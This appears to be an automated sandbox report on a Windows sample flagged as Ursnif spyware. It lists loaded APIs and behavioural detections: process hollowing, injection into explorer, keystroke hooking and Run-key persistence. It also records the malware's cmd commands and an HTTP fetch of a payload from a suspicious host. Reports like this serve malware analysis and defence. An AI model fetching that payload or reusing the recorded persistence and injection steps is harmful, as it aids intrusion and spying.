DynamicLoader: Cabinet.dll/
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: setupapi.dll/SetupIterateCabinetW
DynamicLoader: Cabinet.dll/
DynamicLoader: Cabinet.dll/
DynamicLoader: DEVRTL.dll/DevRtlGetThreadLogToken
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: Cabinet.dll/
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: CRYPT32.dll/CertVerifyCertificateChainPolicy
DynamicLoader: CRYPT32.dll/CertFreeCertificateChain
DynamicLoader: CRYPT32.dll/CertDuplicateCertificateContext
DynamicLoader: ncrypt.dll/SslEncryptPacket
DynamicLoader: ncrypt.dll/SslDecryptPacket
DynamicLoader: WINHTTP.dll/WinHttpQueryHeaders
DynamicLoader: WINHTTP.dll/WinHttpReadData
DynamicLoader: ole32.dll/CreateStreamOnHGlobal
DynamicLoader: WINHTTP.dll/WinHttpCloseHandle
DynamicLoader: CRYPT32.dll/CertFreeCertificateContext
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: CRYPT32.dll/CertFreeCertificateContext
DynamicLoader: ADVAPI32.dll/RegCreateKeyA
DynamicLoader: ADVAPI32.dll/RegSetValueExA
DynamicLoader: USER32.dll/GetShellWindow
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: ntdll.dll/RtlExitUserThread
DynamicLoader: kernel32.dll/CreateRemoteThread
DynamicLoader: ADVAPI32.dll/GetUserNameW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: ncrypt.dll/SslFreeObject
DynamicLoader: ntdll.dll/ZwQueryInformationToken
DynamicLoader: ntdll.dll/ZwOpenProcess
DynamicLoader: ntdll.dll/ZwClose
DynamicLoader: ntdll.dll/ZwOpenProcessToken
DynamicLoader: ntdll.dll/strcpy
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/NtResumeProcess
DynamicLoader: ntdll.dll/RtlNtStatusToDosError
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/NtSuspendProcess
DynamicLoader: ntdll.dll/memcpy
DynamicLoader: ntdll.dll/NtMapViewOfSection
DynamicLoader: ntdll.dll/_snprintf
DynamicLoader: ntdll.dll/_wcsupr
DynamicLoader: ntdll.dll/_strupr
DynamicLoader: ntdll.dll/memmove
DynamicLoader: ntdll.dll/wcscpy
DynamicLoader: ntdll.dll/memset
DynamicLoader: ntdll.dll/ZwQueryKey
DynamicLoader: ntdll.dll/RtlFreeUnicodeString
DynamicLoader: ntdll.dll/RtlUpcaseUnicodeString
DynamicLoader: ntdll.dll/wcstombs
DynamicLoader: ntdll.dll/RtlImageNtHeader
DynamicLoader: ntdll.dll/RtlAdjustPrivilege
DynamicLoader: ntdll.dll/mbstowcs
DynamicLoader: ntdll.dll/NtUnmapViewOfSection
DynamicLoader: ntdll.dll/NtCreateSection
DynamicLoader: ntdll.dll/sprintf
DynamicLoader: ntdll.dll/wcscat
DynamicLoader: ntdll.dll/__C_specific_handler
DynamicLoader: ntdll.dll/__chkstk
DynamicLoader: kernel32.dll/lstrcpynA
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/TerminateThread
DynamicLoader: kernel32.dll/LoadLibraryW
DynamicLoader: kernel32.dll/GetModuleHandleW
DynamicLoader: kernel32.dll/GetComputerNameW
DynamicLoader: kernel32.dll/VirtualProtectEx
DynamicLoader: kernel32.dll/FileTimeToLocalFileTime
DynamicLoader: kernel32.dll/QueueUserWorkItem
DynamicLoader: kernel32.dll/SystemTimeToFileTime
DynamicLoader: kernel32.dll/GetFileTime
DynamicLoader: kernel32.dll/FindNextFileA
DynamicLoader: kernel32.dll/FindFirstFileA
DynamicLoader: kernel32.dll/CompareFileTime
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsA
DynamicLoader: kernel32.dll/GetModuleFileNameA
DynamicLoader: kernel32.dll/GetLocalTime
DynamicLoader: kernel32.dll/CreateFileA
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/lstrcatA
DynamicLoader: kernel32.dll/CreateDirectoryA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/RemoveDirectoryA
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/DeleteFileA
DynamicLoader: kernel32.dll/lstrcpyA
DynamicLoader: kernel32.dll/HeapReAlloc
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/HeapDestroy
DynamicLoader: kernel32.dll/HeapCreate
DynamicLoader: kernel32.dll/SetWaitableTimer
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/WaitForSingleObject
DynamicLoader: kernel32.dll/GetCurrentThread
DynamicLoader: kernel32.dll/GetSystemTimeAsFileTime
DynamicLoader: kernel32.dll/GetWindowsDirectoryA
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateEventA
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/lstrcmpiW
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/lstrcatW
DynamicLoader: kernel32.dll/GetCurrentThreadId
DynamicLoader: kernel32.dll/DuplicateHandle
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/GetTempPathA
DynamicLoader: kernel32.dll/SuspendThread
DynamicLoader: kernel32.dll/ResumeThread
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/SwitchToThread
DynamicLoader: kernel32.dll/lstrcmpA
DynamicLoader: kernel32.dll/MapViewOfFile
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/LeaveCriticalSection
DynamicLoader: kernel32.dll/SetLastError
DynamicLoader: kernel32.dll/lstrcmpiA
DynamicLoader: kernel32.dll/EnterCriticalSection
DynamicLoader: kernel32.dll/ResetEvent
DynamicLoader: kernel32.dll/OpenWaitableTimerA
DynamicLoader: kernel32.dll/OpenMutexA
DynamicLoader: kernel32.dll/WaitForMultipleObjects
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/ReleaseMutex
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/CreateWaitableTimerA
DynamicLoader: kernel32.dll/InitializeCriticalSection
DynamicLoader: kernel32.dll/UnregisterWait
DynamicLoader: kernel32.dll/TlsGetValue
DynamicLoader: kernel32.dll/LoadLibraryExW
DynamicLoader: kernel32.dll/TlsSetValue
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/RegisterWaitForSingleObject
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/TlsAlloc
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/GetFileSize
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/WideCharToMultiByte
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/CreateProcessA
DynamicLoader: kernel32.dll/CreateFileMappingA
DynamicLoader: kernel32.dll/OpenFileMappingA
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/Thread32First
DynamicLoader: kernel32.dll/Thread32Next
DynamicLoader: kernel32.dll/QueueUserAPC
DynamicLoader: kernel32.dll/OpenThread
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/CallNamedPipeA
DynamicLoader: kernel32.dll/WaitNamedPipeA
DynamicLoader: kernel32.dll/ConnectNamedPipe
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/GetOverlappedResult
DynamicLoader: kernel32.dll/DisconnectNamedPipe
DynamicLoader: kernel32.dll/FlushFileBuffers
DynamicLoader: kernel32.dll/CreateNamedPipeA
DynamicLoader: kernel32.dll/CancelIo
DynamicLoader: kernel32.dll/GetSystemTime
DynamicLoader: kernel32.dll/RemoveVectoredExceptionHandler
DynamicLoader: kernel32.dll/SleepEx
DynamicLoader: kernel32.dll/AddVectoredExceptionHandler
DynamicLoader: kernel32.dll/OpenEventA
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/FreeLibrary
DynamicLoader: kernel32.dll/RaiseException
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/FileTimeToSystemTime
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetVersion
DynamicLoader: kernel32.dll/DeleteCriticalSection
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/RemoveDirectoryW
DynamicLoader: kernel32.dll/GetTempFileNameA
DynamicLoader: kernel32.dll/SetEndOfFile
DynamicLoader: kernel32.dll/SetFilePointer
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/SetFilePointerEx
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: ADVAPI32.dll/ConvertStringSecurityDescriptorToSecurityDescriptorA
DynamicLoader: SHLWAPI.dll/StrRChrA
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: ADVAPI32.dll/GetUserNameA
DynamicLoader: PSAPI.DLL/EnumProcessModules
DynamicLoader: ADVAPI32.dll/RegOpenKeyA
DynamicLoader: ADVAPI32.dll/RegQueryValueExA
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: SHLWAPI.dll/StrToIntExA
DynamicLoader: SHLWAPI.dll/StrChrA
DynamicLoader: SHLWAPI.dll/StrTrimA
DynamicLoader: SHLWAPI.dll/StrStrIA
DynamicLoader: WINHTTP.dll/WinHttpOpen
DynamicLoader: WINHTTP.dll/WinHttpConnect
DynamicLoader: WINHTTP.dll/WinHttpOpenRequest
DynamicLoader: WINHTTP.dll/WinHttpQueryOption
DynamicLoader: WINHTTP.dll/WinHttpSetOption
DynamicLoader: WINHTTP.dll/WinHttpSendRequest
DynamicLoader: WS2_32.dll/GetAddrInfoW
DynamicLoader: WS2_32.dll/WSASocketW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSAIoctl
DynamicLoader: WS2_32.dll/FreeAddrInfoW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSARecv
DynamicLoader: WS2_32.dll/WSASend
DynamicLoader: WINHTTP.dll/WinHttpReceiveResponse
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: schannel.DLL/SpUserModeInitialize
DynamicLoader: ADVAPI32.dll/RegCreateKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: WINHTTP.dll/WinHttpQueryHeaders
DynamicLoader: WINHTTP.dll/WinHttpReadData
DynamicLoader: WINHTTP.dll/WinHttpCloseHandle
DynamicLoader: Secur32.dll/FreeContextBuffer
DynamicLoader: ncrypt.dll/SslOpenProvider
DynamicLoader: ncrypt.dll/GetSChannelInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/SslIncrementProviderReferenceCount
DynamicLoader: ncrypt.dll/SslImportKey
DynamicLoader: bcryptprimitives.dll/GetCipherInterface
DynamicLoader: ncrypt.dll/SslLookupCipherSuiteInfo
DynamicLoader: USER32.dll/LoadStringW
DynamicLoader: ncrypt.dll/BCryptOpenAlgorithmProvider
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/BCryptGetProperty
DynamicLoader: ncrypt.dll/BCryptCreateHash
DynamicLoader: ncrypt.dll/BCryptHashData
DynamicLoader: ncrypt.dll/BCryptFinishHash
DynamicLoader: ncrypt.dll/BCryptDestroyHash
DynamicLoader: CRYPT32.dll/CertGetCertificateChain
DynamicLoader: USERENV.dll/GetUserProfileDirectoryW
DynamicLoader: sechost.dll/ConvertStringSidToSidW
DynamicLoader: USERENV.dll/RegisterGPNotification
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: sensapi.dll/IsNetworkAlive
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: SETUPAPI.dll/SetupIterateCabinetW
DynamicLoader: Cabinet.dll/
DynamicLoader: Cabinet.dll/
DynamicLoader: devrtl.DLL/DevRtlGetThreadLogToken
DynamicLoader: CRYPTSP.dll/CryptAcquireContextA
DynamicLoader: bcryptprimitives.dll/GetAsymmetricEncryptionInterface
DynamicLoader: ncrypt.dll/BCryptImportKeyPair
DynamicLoader: ncrypt.dll/BCryptVerifySignature
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/BCryptDestroyKey
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/QueryServiceConfigA
DynamicLoader: sechost.dll/QueryServiceStatus
DynamicLoader: sechost.dll/CloseServiceHandle
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeA
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingA
DynamicLoader: RPCRT4.dll/RpcEpResolveBinding
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: RPCRT4.dll/RpcStringFreeA
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: WINHTTP.dll/WinHttpOpen
DynamicLoader: WINHTTP.dll/WinHttpSetTimeouts
DynamicLoader: WINHTTP.dll/WinHttpSetOption
DynamicLoader: WINHTTP.dll/WinHttpCrackUrl
DynamicLoader: WINHTTP.dll/WinHttpConnect
DynamicLoader: WINHTTP.dll/WinHttpOpenRequest
DynamicLoader: WINHTTP.dll/WinHttpGetDefaultProxyConfiguration
DynamicLoader: WINHTTP.dll/WinHttpGetIEProxyConfigForCurrentUser
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: NSI.dll/NsiAllocateAndGetTable
DynamicLoader: CFGMGR32.dll/CM_Open_Class_Key_ExW
DynamicLoader: IPHLPAPI.DLL/ConvertInterfaceGuidToLuid
DynamicLoader: IPHLPAPI.DLL/GetIfEntry2
DynamicLoader: IPHLPAPI.DLL/GetIpForwardTable2
DynamicLoader: IPHLPAPI.DLL/GetIpNetEntry2
DynamicLoader: IPHLPAPI.DLL/FreeMibTable
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: NSI.dll/NsiFreeTable
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: WINHTTP.dll/WinHttpGetProxyForUrl
DynamicLoader: WINHTTP.dll/WinHttpTimeFromSystemTime
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: WINHTTP.dll/WinHttpSendRequest
DynamicLoader: WINHTTP.dll/WinHttpReceiveResponse
DynamicLoader: WINHTTP.dll/WinHttpQueryHeaders
DynamicLoader: SHLWAPI.dll/StrStrIW
DynamicLoader: WINHTTP.dll/WinHttpCloseHandle
DynamicLoader: SETUPAPI.dll/SetupIterateCabinetW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: SETUPAPI.dll/SetupIterateCabinetW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: SETUPAPI.dll/SetupIterateCabinetW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: CRYPT32.dll/CertVerifyCertificateChainPolicy
DynamicLoader: CRYPT32.dll/CertFreeCertificateChain
DynamicLoader: CRYPT32.dll/CertDuplicateCertificateContext
DynamicLoader: ncrypt.dll/SslEncryptPacket
DynamicLoader: ncrypt.dll/SslDecryptPacket
DynamicLoader: ole32.dll/CreateStreamOnHGlobal
DynamicLoader: CRYPT32.dll/CertFreeCertificateContext
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: CRYPT32.dll/CertFreeCertificateContext
DynamicLoader: ADVAPI32.dll/RegCreateKeyA
DynamicLoader: ADVAPI32.dll/RegSetValueExA
DynamicLoader: USER32.dll/SetWindowsHookExA
DynamicLoader: USER32.dll/RegisterClassA
DynamicLoader: USER32.dll/CreateWindowExA
DynamicLoader: USER32.dll/GetWindowLongPtrA
DynamicLoader: USER32.dll/DefWindowProcA
DynamicLoader: USER32.dll/SetWindowLongPtrA
DynamicLoader: USER32.dll/SetClipboardViewer
DynamicLoader: USER32.dll/IsClipboardFormatAvailable
DynamicLoader: USER32.dll/GetClipboardOwner
DynamicLoader: USER32.dll/RegisterDeviceNotificationA
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: SHLWAPI.dll/StrChrW
DynamicLoader: SHLWAPI.dll/PathCombineW
DynamicLoader: USER32.dll/GetMessageA
Encrypts a single HTTP packet
http_request: GET /license/3_0.txt HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: www.php.net
http_request: GET /license/3_0.txt HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: www.php.net
Reads data out of its own binary image
self_read: process: ErfkBwzLz2p.exe, pid: 920, offset: 0x00000000, length: 0x0004ea00
A process created a hidden window
Process: ErfkBwzLz2p.exe -> C:\Users\user\AppData\Local\Temp\DA24\BF2.bat
Drops a binary and executes it
binary: C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
binary: C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
HTTP traffic contains suspicious features which may be indicative of malware related traffic
get_no_useragent: HTTP traffic contains a GET request with no user-agent header
suspicious_request: http://www.php.net/license/3_0.txt
suspicious_request: http://groupcreatedt.at/key/x64.bin
Performs some HTTP requests
url: http://www.php.net/license/3_0.txt
url: http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
url: http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
url: http://groupcreatedt.at/key/x64.bin
The binary likely contains encrypted or compressed data.
section: name: .rsrc, entropy: 8.00, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ, raw_size: 0x00045a00, virtual_size: 0x00045910
Uses Windows utilities for basic functionality
command: cmd /c ""C:\Users\user\AppData\Local\Temp\DA24\BF2.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\ERFKBW~1.EXE""
command: cmd /C ""C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\ERFKBW~1.EXE""
Uses Windows utilities for basic functionality
command: C:\Users\user\AppData\Local\Temp\DA24\BF2.bat "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\ERFKBW~1.EXE"
Queries information on disks for anti-virtualization via Device Information APIs
Behavioural detection: Injection (Process Hollowing)
Injection: corrawex.exe(948) -> svchost.exe(2092)
Executed a process and injected code into it, probably while unpacking
Injection: corrawex.exe(948) -> svchost.exe(2092)
Deletes its original binary from disk
Sniffs keystrokes
SetWindowsHookExA: Process: explorer.exe(1632)
Behavioural detection: Injection (inter-process)
Behavioural detection: Injection with CreateRemoteThread in a remote process
A system process is generating network traffic likely as a result of process injection
network_connection: explorer.exe_WSASend_get /license/3_0.txt http/1.1 cache-control: no-cache connection: keep-alive pragma: no-cache host: www.php.net
network_connection: explorer.exe_WSASend_get /key/x64.bin http/1.1 cache-control: no-cache connection: keep-alive pragma: no-cache host: groupcreatedt.at
network_connection: explorer.exe_WSASend_\x16\x03\x01\x00n\x01\x00\x00j\x03\x01^y\xd6\xc2\x1a\xba\x04%'v\xdd\xfd\x0b\xd2\x0b3\x1bs\xc1\x1dm\xea\xe2.n-k\xae[\x03w&\x00\x00\x18\x00/\x005\x00\x05\x00 \xc0\x13\xc0\x14\xc0 \xc0 \x002\x008\x00\x13\x00\x04\x01\x00\x00)\xff\x01\x00\x01\x00\x00\x00\x00\x10\x00\x0e\x00\x00\x0bwww.php.net\x00 \x00\x06\x00\x04\x00\x17\x00\x18\x00\x0b\x00\x02\x01\x00
network_connection: explorer.exe_WSASend_\x16\x03\x01\x00f\x10\x00\x00ba\x040\xc2i}*\x8dmp\x8f5jw\x8b]\xff\xc9\xae\xd1\x96@\xe1!\xd0mi\xfa\xd1uh\xaf\x13-x\xf2\x8a\x86\x8b1\x7f\xa3\x18\x9e\xad\x1f/\xd8,\xb4\xa4y\x9f\xae\x13\xff\xa7\x8cs\x1d\xcbk\x94\x04vg\x14\x03\x01\x00\x01\x01\x16\x03\x01\x000ul\xaf\x0c\xe3\x7fop\xad\xf7.\x8b\x15\x89\xfa\xa1\x1cb\x91c\x91\x1c\x91\xab\xd7a\x18\xb6\xc6f\x9c\x9c\xd6\x9e\x17o\xd8\xeb"(\xa5t\x93 \x11\xdc\xb4"
network_connection: explorer.exe_WSASend_get /msdownload/update/v3/static/trustedr/en/authrootstl.cab http/1.1 cache-control: max-age = 3600 connection: keep-alive accept: */* if-modified-since: wed, 26 feb 2020 21:39:14 gmt if-none-match: "06d5b30edecd51:0" user-agent: microsoft-cryptoapi/
network_connection: explorer.exe_WSASend_\x17\x03\x01\x00\x90\x8fc\x1c\x90\xf1\x01\x0e\x89y=\x11i-\x89\xc7n\xc5\xd5\xe9z\x94q\x0b\x13\xcf\x84z+\xc8\xfa\x16\xf4\xdd\xae\xa5\xb3'c\x9c\xbc\xc8c\xaed\x05[d\x06\xee\xb6\x84n\xc61{@\xbc9\xae\xb7\xb3\x10\xbe\x1e\xa8\x06\x0e\xf9(\xe3\x073'\x0e\x16`3 y\xce#\xd9\x80\\x1d\x12\xf4q;\xc9\xa7\xc7c\x01\x06l +}\x9d\xbf\xf2e\xa0\x83x\x80\xf4\xcb\xf3\x7f\x05\xd2\xd8%v\xcf\x8awlh\x84|\x153$\xcca\xd0q\xdax#\xda\xc9\xd5{@b\xdap\xcb\x97?
Installs itself for autorun at Windows startup
key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dnshdrt
data: C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
Exhibits behavior characteristics of Ursnif spyware
Creates a copy of itself
copy: C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
Creates a slightly modified copy of itself
file: C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
percent_match: 99

Screenshots


Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States
N 23.202.161.73 [VT] United States
N 192.42.116.41 [VT] Netherlands
N 192.229.232.240 [VT] United States
N 185.85.0.29 [VT] Germany

DNS

Name Response Post-Analysis Lookup
www.php.net [VT] A 185.85.0.29 [VT]
CNAME www-php-net.ax4z.com [VT]
www.download.windowsupdate.com [VT] CNAME cs12.wpc.v0cdn.net [VT]
A 192.229.232.240 [VT]
CNAME 2-01-3cf7-0009.cdx.cedexis.net [VT]
CNAME wu.ec.azureedge.net [VT]
CNAME wu.wpc.apr-52dd2.edgecastdns.net [VT]
CNAME wu.azureedge.net [VT]
www.microsoft.com [VT] CNAME www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net [VT]
CNAME e13678.dspb.akamaiedge.net [VT]
CNAME www.microsoft.com-c-3.edgekey.net [VT]
A 23.202.161.73 [VT]
groupcreatedt.at [VT] A 192.42.116.41 [VT]

Summary

C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\user\AppData\Local\Temp\gfycfilt.dll
C:\Windows\System32\gfycfilt.dll
C:\Windows\system\gfycfilt.dll
C:\Windows\gfycfilt.dll
C:\Windows\System32\wbem\gfycfilt.dll
C:\Windows\System32\WindowsPowerShell\v1.0\gfycfilt.dll
C:\Users\user\AppData\Local\Temp\ErfkBwzLz2p.exe
C:\Users
C:\Users\user
C:\Users\user\AppData
C:\Users\user\AppData\Local
C:\Users\user\AppData\Local\Temp
C:\321.txt
C:\Windows\sysnative\C_1252.NLS
C:\Windows\sysnative\*.dll
C:\Users\user\AppData\Roaming\Microsoft
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
C:\Users\user\AppData\Local\Temp\DA24
C:\Users\user\AppData\Local\Temp\DA24\BF2.tmp
C:\Users\user\AppData\Local\Temp\DA24\BF2.bat
\??\MountPointManager
C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Local\Temp\DA24\BF2.bat"
C:\Users\user\AppData\Local\Temp\cmd.*
C:\Users\user\AppData\Local\Temp\cmd
C:\Windows\System32\cmd.*
C:\Windows\System32\cmd.COM
